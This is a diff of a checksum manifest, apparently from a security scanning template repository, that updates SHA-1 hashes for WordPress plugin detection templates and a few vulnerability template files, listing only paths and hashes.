-http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30
-http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e
-http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b
-http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f
-http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391
-http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde
-http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a
-http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac
-http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc
-http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3
-http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046
-http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8
-http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b
-http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0
-http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c
-http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3
-http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519
-http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4
-http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb
-http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4
-http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623
-http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd
-http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb
-http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510
-http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015
-http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9
-http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29
-http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf
-http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8
-http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5
-http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4
-http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159
-http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af
-http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9
-http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68
-http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18
+http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7
+http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90
+http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078
+http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb
+http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994
+http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c
+http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47
+http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43
+http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5
+http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf
+http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b
+http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952
+http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65
+http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e
+http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c
+http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9
+http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9
+http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9
+http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787
+http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764
+http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93
+http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b
+http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc
+http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d
+http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea
+http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d
+http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd
+http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f
+http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919
+http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251
+http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e
+http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6
+http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50
+http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9
+http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c
+http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f
+http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6
+http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11
+http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0
+http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8
+http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70
+http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7
+http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1
+http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12
 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd
 http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553
-http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c32339accaeaeac78ec9c14a8092e538a37cae47
-http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c
-http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d
-http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988
-http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
-http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
-http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
-http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
-http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
-http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
-http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
-http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
-http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
-http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
-http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
-http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
-http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
-http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
-http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
-http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
-http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
+http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5
+http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f
+http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83
+http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a
+http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa
+http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da
+http/technologies/wordpress/plugins/post-types-order.yaml:c140e8206ede576928c853247b1139a9e1306bf2
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4
+http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad
+http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175
+http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864
+http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490
+http/technologies/wordpress/plugins/sg-cachepress.yaml:3b166aca8dab47fdce5d13abd98c504b0abfbfcf
+http/technologies/wordpress/plugins/sg-security.yaml:1d900366a34bc7240fd070b931b8a69db1fe6291
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
-http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
+http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
+http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
-http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
-http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
-http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
-http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
-http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
+http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
+http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
+http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
+http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
+http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
-http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
-http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
-http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
-http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
-http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
-http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
+http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
+http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
+http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
+http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
+http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
+http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
+http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
-http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
-http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
-http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
-http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
-http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
-http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
-http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
-http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
+http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
+http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
+http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
+http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
+http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
+http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
+http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
+http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
+http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
-http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
-http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
-http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
-http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
-http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
+http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
+http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
+http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
+http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
+http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -6321,7 +6321,7 @@ http/vulnerabilities/cisco/cucm-username-enumeration.yaml:243ce2fe32405c9d5cbd69
 http/vulnerabilities/code42/code42-log4j-rce.yaml:810967e30a4b0e211a5f52519818bb3fa37c5af8
 http/vulnerabilities/concrete/concrete-xss.yaml:5c74a4c209709ab941b1df34e00672aa4d624edb
 http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:94e59ce09c6f7a5b757bcb275f9fba3b4f350441
-http/vulnerabilities/dbgate-unauth-rce.yaml:915edb3593e8e77410601c9cf8a3e691972824ad
+http/vulnerabilities/dbgate-unauth-rce.yaml:acd1cdad315df0193c9f2b6676680803d2e636e0
 http/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml:620f9d28007c42f54ed76141e370e5158d667055
 http/vulnerabilities/dedecms/dedecms-config-xss.yaml:16b7ffa61db6c0e6b550a9fdf0bf385085005d7f
 http/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml:079f7c526b753b2eff94ca66ba8a8b4571dc2682
@@ -7076,7 +7076,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:c53726cb5d97073863591694b689507b9cdc7663
